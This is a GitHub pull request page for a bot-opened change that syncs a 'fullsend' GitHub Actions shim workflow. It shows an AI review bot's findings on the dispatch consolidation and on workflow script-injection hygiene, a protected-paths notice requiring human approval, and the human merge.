Skip to content

chore: update fullsend shim workflow#16

Merged
ralphbean merged 1 commit into
mainfrom
fullsend/onboard
May 4, 2026
Merged

chore: update fullsend shim workflow#16
ralphbean merged 1 commit into
mainfrom
fullsend/onboard

Conversation

@fullsend-ai-fullsend
Copy link
Copy Markdown
Contributor

@fullsend-ai-fullsend fullsend-ai-fullsend Bot commented May 4, 2026

This PR updates the fullsend shim workflow to match the current template in the .fullsend config repo.

The shim content has drifted from the template — this brings it back in sync.

@fullsend-ai-fullsend fullsend-ai-fullsend Bot requested a review from a team as a code owner May 4, 2026 15:25
@fullsend-ai-review
Copy link
Copy Markdown

fullsend-ai-review Bot commented May 4, 2026
edited
Loading

Review: #16

Head SHA: a5d51c1
Timestamp: 2026-05-04T00:00:00Z
Outcome: comment-only

Summary

This PR consolidates per-role workflow dispatches (triage.yml, code.yml, review.yml, fix.yml) into a single dispatch.yml with a -f stage=<name> parameter, updates comments, and adds a new dispatch-gh-classify job for issue classification. The consolidation is mechanically consistent across the triage, code, review, and fix jobs. Two medium-severity findings relate to a semantic change in trigger_source values and a deviation from the file's established script-injection-prevention pattern in the new dispatch-gh-classify job. Neither is blocking, but both warrant attention.

Findings

Medium

  • [semantic-change] .github/workflows/fullsend.yaml:200,267trigger_source changed from hardcoded "bot"/"human" to the actual user login (github.event.review.user.login / github.event.comment.user.login). This is a behavioral change, not just a template sync. If dispatch.yml routes or authorizes based on the old "bot" / "human" string values, this will silently break that logic. Verify the downstream consumer expects username values.

  • [script-injection-pattern] .github/workflows/fullsend.yaml:280 — In the new dispatch-gh-classify payload step, ${{ github.repository }} is interpolated directly inside the run: block (--arg repo "${{ github.repository }}"). Every other job in this file carefully passes GitHub context expressions through env: variables to prevent script injection. While github.repository is not attacker-controlled and this is not exploitable, it breaks the established security pattern. Use an env var (e.g., SOURCE_REPO) for consistency.

Low

  • [inconsistent-dispatch] .github/workflows/fullsend.yaml:289-295 — dispatch-gh-classify dispatches directly to gh-classify.yml using --field, while every other job was consolidated to dispatch through dispatch.yml using -f. If gh-classify.yml is intentionally kept separate from the dispatch consolidation, a comment explaining why would help future readers.

  • [style] .github/workflows/fullsend.yaml:289-295 — dispatch-gh-classify's dispatch step uses --field (long form) while all other updated dispatch steps use -f (short form). Minor inconsistency.

Footer

Outcome: comment-only
This review applies to SHA a5d51c1059713ad4ef319db2b16f98953a80b5e7. Any push to the PR head clears this review and requires a new evaluation.

Previous run

Review: #16

Head SHA: 0dacba4
Timestamp: 2026-05-04T00:00:00Z
Outcome: approve

Summary

This PR consolidates four per-role dispatch targets (triage.yml, code.yml, review.yml, fix.yml) into a single dispatch.yml with a stage parameter, syncing the shim with the current .fullsend config template. All changes are mechanical and consistent across the four dispatch jobs. The pull_request_target security model is preserved, and environment-variable-based input handling correctly avoids script injection. No critical, high, or medium findings.

Findings

Info

  • [Correctness] dispatch-fix-bot / dispatch-fix-human — The trigger_source field changed semantics from a static type label ("bot" / "human") to the actual GitHub username (github.event.review.user.login / github.event.comment.user.login). This is a behavioral change that requires the downstream dispatch.yml to accept usernames rather than type labels. Since this PR syncs with the .fullsend template, the dispatcher presumably already expects this — but worth confirming the dispatcher was updated first.

Footer

Outcome: approve
This review applies to SHA 0dacba4. Any push to the PR head clears this review and requires a new evaluation.

Protected paths detected — this PR modifies files under one or more
protected paths. The review agent cannot approve PRs that touch these paths.
A human reviewer must approve this PR.

Protected files in this PR:

  • .github/workflows/fullsend.yaml

fullsend-ai-review[bot]
fullsend-ai-review Bot reviewed May 4, 2026
View reviewed changes
Copy link
Copy Markdown

@fullsend-ai-review fullsend-ai-review Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

See the review comment for full details.

fullsend-ai-review[bot]
fullsend-ai-review Bot reviewed May 4, 2026
View reviewed changes
Copy link
Copy Markdown

@fullsend-ai-review fullsend-ai-review Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

See the review comment for full details.

@ralphbean ralphbean added this pull request to the merge queue May 4, 2026
Merged via the queue into main with commit 3da0d72 May 4, 2026
11 checks passed
@ralphbean ralphbean deleted the fullsend/onboard branch May 4, 2026 19:56
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

1 more reviewer

@fullsend-ai-review fullsend-ai-review[bot] fullsend-ai-review[bot] left review comments

Reviewers whose approvals may not affect merge requirements

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@ralphbean